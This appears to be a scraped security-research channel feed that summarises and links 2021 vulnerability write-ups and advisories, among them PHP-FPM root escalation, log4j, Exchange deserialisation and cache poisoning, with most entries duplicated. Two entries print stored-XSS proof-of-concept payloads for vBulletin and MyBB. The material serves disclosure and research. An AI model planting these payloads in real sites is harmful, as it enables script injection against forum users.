We are pleased to present the utility developed by our researcher Philip Nikiforov for Flutter apps traffic monitoring.
Just make app trust installed certificates by repacking it with reFlutter and hunt bugs using Burp Suite. No root, no VPN, no more hassle!
https://github.com/ptswarm/reFlutter
Just make app trust installed certificates by repacking it with reFlutter and hunt bugs using Burp Suite. No root, no VPN, no more hassle!
https://github.com/ptswarm/reFlutter
Building a POC for CVE-2021-40438
👤 by Firzen
A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. The author of the article found a way to exploit it
📝 Contents:
• The Patch
• How to exploit?
• How uds_path is being set?
• Success
• Conclusion and Remarks
https://firzen.de/building-a-poc-for-cve-2021-40438
👤 by Firzen
A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. The author of the article found a way to exploit it
📝 Contents:
• The Patch
• How to exploit?
• How uds_path is being set?
• Success
• Conclusion and Remarks
https://firzen.de/building-a-poc-for-cve-2021-40438
New article: "WinRAR’s vulnerable trialware: when free software isn’t free" by our researcher Igor Sak-Sakovskiy.
In this article, we show how vulnerabilities in trialware could beсome a gate for hackers.
https://swarm.ptsecurity.com/winrars-vulnerable-trialware-when-free-software-isnt-free/
In this article, we show how vulnerabilities in trialware could beсome a gate for hackers.
https://swarm.ptsecurity.com/winrars-vulnerable-trialware-when-free-software-isnt-free/
PHP-FPM Local Root Vulnerability
👤 by Charles Fol
PHP-FPM (FastCGI Process Manager) is the official PHP FastCGI server. It is used in conjunction with an HTTP server such as Apache or NGINX to handle the processing of PHP files. It generally listens for connections over either a UNIX socket or on TCP port 9000. When the HTTP server needs to run a PHP file, it will forward parameters, such as the file path, PHP variables, and configuration to PHP-FPM, which will send back a response.
A low-privilege process can read and write an array of pointers used by the main process, running as root, through shared memory. An attacker can leverage this problem to change a 32-bit integer from zero to one in the main process's memory, or clear a memory region. By leveraging the primitive multiple times, it is possible to reach another bug, make the main process execute code, and thus escalate privileges.
Due to the growing adoption of NGINX instead of Apache, a good look at PHP-FPM was in order. An oversight in the design of the shared memory region lead to half-decent exploitation primitives, which in turn lead to a root privilege escalation.
📝 Contents:
• Introduction
• Overview of the bug
• Overview of PHP-FPM
• Main process and workers
• Scoreboards
• IPC through SHM
• Proecss scoreboard management and the bad primitive
• An example
• Exploitation
• Tailoring the primitive
• Reaching the heap: setting catch_workers_output
• Good enough ?
• All your bases
• Persistent worker control
• Capping the number of workers
• Closed FD
• Error-free PHP
• Problem-free exploitation tactics
• Managing streams: zlog_stream
• Unreachable heap overflow
• Faking the streams, getting root
• Heap overflow
• Arbitrary write
• Demo
• Vulnerable versions
• Conclusion and Remarks
https://ambionics.io/blog/php-fpm-local-root
👤 by Charles Fol
PHP-FPM (FastCGI Process Manager) is the official PHP FastCGI server. It is used in conjunction with an HTTP server such as Apache or NGINX to handle the processing of PHP files. It generally listens for connections over either a UNIX socket or on TCP port 9000. When the HTTP server needs to run a PHP file, it will forward parameters, such as the file path, PHP variables, and configuration to PHP-FPM, which will send back a response.
A low-privilege process can read and write an array of pointers used by the main process, running as root, through shared memory. An attacker can leverage this problem to change a 32-bit integer from zero to one in the main process's memory, or clear a memory region. By leveraging the primitive multiple times, it is possible to reach another bug, make the main process execute code, and thus escalate privileges.
Due to the growing adoption of NGINX instead of Apache, a good look at PHP-FPM was in order. An oversight in the design of the shared memory region lead to half-decent exploitation primitives, which in turn lead to a root privilege escalation.
📝 Contents:
• Introduction
• Overview of the bug
• Overview of PHP-FPM
• Main process and workers
• Scoreboards
• IPC through SHM
• Proecss scoreboard management and the bad primitive
• An example
• Exploitation
• Tailoring the primitive
• Reaching the heap: setting catch_workers_output
• Good enough ?
• All your bases
• Persistent worker control
• Capping the number of workers
• Closed FD
• Error-free PHP
• Problem-free exploitation tactics
• Managing streams: zlog_stream
• Unreachable heap overflow
• Faking the streams, getting root
• Heap overflow
• Arbitrary write
• Demo
• Vulnerable versions
• Conclusion and Remarks
https://ambionics.io/blog/php-fpm-local-root
Ambionics
PHP-FPM local root vulnerability (CVE-2021-21703)
This article reveals a privilege escalation vulnerability affecting PHP-FPM.
Discourse SNS webhook RCE
👤 by joernchen
Discourse is the open source discussion platform built for the next decade of the Internet. It can be used as a: mailing list, discussion forum, long-form chat room etc
A validation bug in the upstream aws-sdk-sns gem can lead to RCE in Discourse via a maliciously crafted request.
https://0day.click/recipe/discourse-sns-rce/
👤 by joernchen
Discourse is the open source discussion platform built for the next decade of the Internet. It can be used as a: mailing list, discussion forum, long-form chat room etc
A validation bug in the upstream aws-sdk-sns gem can lead to RCE in Discourse via a maliciously crafted request.
https://0day.click/recipe/discourse-sns-rce/
0day.click
Discourse SNS webhook RCE
I was staring at this part of the code for way too long already:
module Jobs class ConfirmSnsSubscription < ::Jobs::Base sidekiq_options retry: false def execute(args) return unless raw = args[:raw].presence return unless json = args[:json].presence return…
module Jobs class ConfirmSnsSubscription < ::Jobs::Base sidekiq_options retry: false def execute(args) return unless raw = args[:raw].presence return unless json = args[:json].presence return…
Sitecore Experience Platform Pre-Auth RCE
👤 by Shubham Shah
In this blog post, research team detail a pre-authentication RCE vulnerability that affects Sitecore XP versions from 7.5 Initial Release to Sitecore XP 8.2 Update-7.
Sitecore’s Experience Platform (XP) is an enterprise content management system (CMS). This CMS is used heavily by enterprises, including many of the companies within the fortune 500.
The vulnerability is applicable to all Sitecore systems running affected versions, including single-instance and multi-instance environments, Managed Cloud environments, and all Sitecore server roles (Content Delivery, Content Editing, Reporting, Processing, etc.), which are exposed to the Internet.
📝 Contents:
• Intro
• What is Sitecore Experience Platform?
• Mapping out the attack surface
• Discovering the RCE
• Remediation Advice
• Conclusion
https://blog.assetnote.io/2021/11/02/sitecore-rce/
👤 by Shubham Shah
In this blog post, research team detail a pre-authentication RCE vulnerability that affects Sitecore XP versions from 7.5 Initial Release to Sitecore XP 8.2 Update-7.
Sitecore’s Experience Platform (XP) is an enterprise content management system (CMS). This CMS is used heavily by enterprises, including many of the companies within the fortune 500.
The vulnerability is applicable to all Sitecore systems running affected versions, including single-instance and multi-instance environments, Managed Cloud environments, and all Sitecore server roles (Content Delivery, Content Editing, Reporting, Processing, etc.), which are exposed to the Internet.
📝 Contents:
• Intro
• What is Sitecore Experience Platform?
• Mapping out the attack surface
• Discovering the RCE
• Remediation Advice
• Conclusion
https://blog.assetnote.io/2021/11/02/sitecore-rce/
How to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus
👤 by Antoine Cervoise, Wilfried Bécard
ADSS offers multiple functionalities such as managing password policies for administrators or self password reset/account unlock for Active Directory users.
In this article research team explore the details of several vulnerabilities that allow an unauthenticated attacker to execute arbitrary code on the server.
📝 Contents:
• First steps
• Authentication Bypass
• Arbitrary file upload through the API
• Arguments injection
• Chaining everything together to get code execution
• Conclusion
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
👤 by Antoine Cervoise, Wilfried Bécard
ADSS offers multiple functionalities such as managing password policies for administrators or self password reset/account unlock for Active Directory users.
In this article research team explore the details of several vulnerabilities that allow an unauthenticated attacker to execute arbitrary code on the server.
📝 Contents:
• First steps
• Authentication Bypass
• Arbitrary file upload through the API
• Arguments injection
• Chaining everything together to get code execution
• Conclusion
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
Synacktiv
How to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus
Zoom fixed two post-auth RCE (CVE-2021-34416, CVE-2021-34414) and remote system crash (CVE-2021-34415) in Zoom on-premise Meeting Connector found by our researchers Nikita Abramov and Egor Dimitrenko.
Advisory: https://explore.zoom.us/en/trust/security/security-bulletin/
Advisory: https://explore.zoom.us/en/trust/security/security-bulletin/
Cisco fixed an Unauth DoS (CVE-2021-34704) in Cisco ASA and Cisco FTD found by our researcher Nikita Abramov.
A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.
Shodan: 242,070 results 🔥
Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asafdt-webvpn-dos-KSqJAKPA
A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.
Shodan: 242,070 results 🔥
Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asafdt-webvpn-dos-KSqJAKPA
Some notes about Microsoft Exchange Deserialization RCE (CVE-2021–42321)
👤 by Peterjson
Post-Auth Deserialization RCE in Microsoft Exchange Server 2016 and 2019. The vulnerability occurs due to issues with the validation of cmdlet arguments
📝 Contents:
• Intro
• The Sink
• The Source
• Full Exploit
• Improvement
https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852
👤 by Peterjson
Post-Auth Deserialization RCE in Microsoft Exchange Server 2016 and 2019. The vulnerability occurs due to issues with the validation of cmdlet arguments
📝 Contents:
• Intro
• The Sink
• The Source
• Full Exploit
• Improvement
https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852
Medium
Some notes about Microsoft Exchange Deserialization RCE (CVE-2021–42321)
Vietnamese version: https://testbnull.medium.com/some-notes-of-microsoft-exchange-deserialization-rce-cve-2021-42321-f6750243cdcd
Exploiting CSP in Webkit to Break Authentication & Authorization
👤 by Sachin/Prakash
The bug in the CSP implementation of WebKit, a browser engine used by Safari web browser lead to that an attacker able to steal codes/access_tokens or any other secrets that were part of the leaked URI& This allowed to carry out attacks including but not limited to account takeovers, CSRF, and sensitive information disclosure.
📝 Contents:
• TLDR;
• Single Sign-On (SSO)
• Content Security Policy (CSP)
• CSP Violation Reports
• Root Cause of the Vulnerability
• How can this be exploited in SSO
• Responsible Disclosure to Safari
• Setting up PoC
• Playground
• Impact
• Roadblocks
• Stats
• Fixes
• Browsers' Mitigation Strategies
• Bypasses & a new 0day
• DEMO
• Key Takeaways
• Timeline
https://threatnix.io/blog/exploiting-csp-in-webkit-to-break-authentication-authorization/
👤 by Sachin/Prakash
The bug in the CSP implementation of WebKit, a browser engine used by Safari web browser lead to that an attacker able to steal codes/access_tokens or any other secrets that were part of the leaked URI& This allowed to carry out attacks including but not limited to account takeovers, CSRF, and sensitive information disclosure.
📝 Contents:
• TLDR;
• Single Sign-On (SSO)
• Content Security Policy (CSP)
• CSP Violation Reports
• Root Cause of the Vulnerability
• How can this be exploited in SSO
• Responsible Disclosure to Safari
• Setting up PoC
• Playground
• Impact
• Roadblocks
• Stats
• Fixes
• Browsers' Mitigation Strategies
• Bypasses & a new 0day
• DEMO
• Key Takeaways
• Timeline
https://threatnix.io/blog/exploiting-csp-in-webkit-to-break-authentication-authorization/
threatnix.io
Exploiting CSP in Webkit to Break Authentication & Authorization
This blog post will discuss our findings that we presented in our Blackhat Europe talk titled "Exploiting CSP in Webkit to break Authentication/Authorization", a vulnerability that enabled us to takeover user accounts on most of the web applications out thereby…
The persistent XSS in any message in vBulletin! Patched from 13 Apr 2021. The vulnerability was found by our researcher
Igor Sak-Sakovskiy.
PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO]
Advisory: https://www.vbulletin.org/forum/showthread.php?t=328715
Igor Sak-Sakovskiy.
PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO]
Advisory: https://www.vbulletin.org/forum/showthread.php?t=328715
PT SWARM
The persistent XSS in any message in vBulletin! Patched from 13 Apr 2021. The vulnerability was found by our researcher Igor Sak-Sakovskiy. PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO] Advisory: https://www.vbulletin…
No CVE, because of: https://twitter.com/ptswarm/status/1463883088589692930
Twitter
PT SWARM
Hey, @MITREcorp @CVEnew @CVEannounce! During the last 6 months, we have sent you around 18 CVE requests and we have no replies (not auto-replies) for all of them. We really do miss new CVEs😢
PoC for a stored XSS in MyBB < 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy.
Payload:
Advisory: https://github.com/mybb/mybb/security/advisories/GHSA-6483-hcpp-p75w
Payload:
[email]a@a.a?[email=a@a.a? onmouseover=alert(1) a]a[/email][/email]Advisory: https://github.com/mybb/mybb/security/advisories/GHSA-6483-hcpp-p75w
RCE 0-day exploit found in log4j, a popular Java logging package
👤 by Free Wortley, Chris Thompson
0-day exploit in the popular Java logging library log4j was discovered that results in Remote Code Execution (RCE) by logging a certain string. This post provides resources to understand the vulnerability and how to mitigate it.
📝 Contents:
• Who is impacted?
• Affected Apache log4j Versions
• Temporary Mitigations
• How the exploit works
• Exploit Requirements
• Example Vulnerable Code
• Exploit Steps
• How you can prevent future attacks
https://www.lunasec.io/docs/blog/log4j-zero-day/
👤 by Free Wortley, Chris Thompson
0-day exploit in the popular Java logging library log4j was discovered that results in Remote Code Execution (RCE) by logging a certain string. This post provides resources to understand the vulnerability and how to mitigate it.
📝 Contents:
• Who is impacted?
• Affected Apache log4j Versions
• Temporary Mitigations
• How the exploit works
• Exploit Requirements
• Example Vulnerable Code
• Exploit Steps
• How you can prevent future attacks
https://www.lunasec.io/docs/blog/log4j-zero-day/
Cache Poisoning at Scale
👤 by Youstin
Even though Web Cache Poisoning has been around for years, the increasing complexity in technology stacks constantly introduces unexpected behaviour which can be abused to achieve novel cache poisoning attacks. In this paper author will present the techniques that he used to report over 70 cache poisoning vulnerabilities to various Bug Bounty programs.
📝 Contents:
• Backstory
• Incorrect Handling of the URL Fragment in Apache Traffic Server (CVE-2021-27577)
• GitHub CP-DoS
• GitLab CP-DoS
• X-Forwarded-Scheme - Rack Middleware
• CP-DoS on Hackerone.com static files
• Single request DoS of www.shopify.com
• Stored XSS on 21 subdomains
• Cloudflare and Storage Buckets
• S3 Bucket
• Azure Storage
• Fastly Host header injection
• Injecting Keyed Parameters
• User Agent Rules
• Illegal Header Fields
• Finding New Headers
• Common headers
• Conclusion
https://youst.in/posts/cache-poisoning-at-scale/
👤 by Youstin
Even though Web Cache Poisoning has been around for years, the increasing complexity in technology stacks constantly introduces unexpected behaviour which can be abused to achieve novel cache poisoning attacks. In this paper author will present the techniques that he used to report over 70 cache poisoning vulnerabilities to various Bug Bounty programs.
📝 Contents:
• Backstory
• Incorrect Handling of the URL Fragment in Apache Traffic Server (CVE-2021-27577)
• GitHub CP-DoS
• GitLab CP-DoS
• X-Forwarded-Scheme - Rack Middleware
• CP-DoS on Hackerone.com static files
• Single request DoS of www.shopify.com
• Stored XSS on 21 subdomains
• Cloudflare and Storage Buckets
• S3 Bucket
• Azure Storage
• Fastly Host header injection
• Injecting Keyed Parameters
• User Agent Rules
• Illegal Header Fields
• Finding New Headers
• Common headers
• Conclusion
https://youst.in/posts/cache-poisoning-at-scale/
New article "Fuzzing for XSS via nested parsers condition" by our researcher @Psych0tr1a.
This techniques allowed us to find a bunch of vulnerabilities in popular web products that no one had noticed before!
https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/
This techniques allowed us to find a bunch of vulnerabilities in popular web products that no one had noticed before!
https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/
👍2
Our research "Fuzzing for XSS via nested parsers condition" is in the Top 10 Web Hacking Techniques of 2021 nomination list. Don't forget to vote for us if you enjoyed the technique 😜
Link for voting: https://portswigger.net/polls/top-10-web-hacking-techniques-2021
Link for voting: https://portswigger.net/polls/top-10-web-hacking-techniques-2021
👍2
Hacking the Apple Webcam (again)
👤 by Ryan Pickren
Gaining unauthorized camera access via Safari UXSS, this research resulted in 4 0day bugs (CVE-2021-30861, CVE-2021-30975, and two without CVEs), 2 of which were used in the camera hack.
📝 Contents:
• Summary
• Background
• The Attack Plan
• Exploration of custom URI Schemes
• Exploit Requirements
• ShareBear Application
• Bonus Bug: Iframe Sandbox Escape
• Quarantine and Gatekeeper
• Shortcuts
• Full Chain
• Remediation
• Bonus Material (#1)
• Bonus Material (#2)
• Conclusion
https://www.ryanpickren.com/safari-uxss
👤 by Ryan Pickren
Gaining unauthorized camera access via Safari UXSS, this research resulted in 4 0day bugs (CVE-2021-30861, CVE-2021-30975, and two without CVEs), 2 of which were used in the camera hack.
📝 Contents:
• Summary
• Background
• The Attack Plan
• Exploration of custom URI Schemes
• Exploit Requirements
• ShareBear Application
• Bonus Bug: Iframe Sandbox Escape
• Quarantine and Gatekeeper
• Shortcuts
• Full Chain
• Remediation
• Bonus Material (#1)
• Bonus Material (#2)
• Conclusion
https://www.ryanpickren.com/safari-uxss
Ryan Pickren
Webcam Hacking (again) - Safari UXSS | Ryan Pickren
$100,500 Apple Bug Bounty for hacking the webcam via a Safari Universal Cross-Site Scripting (UXSS) bug. CVE-2021-30861, CVE-2021-30975
👍5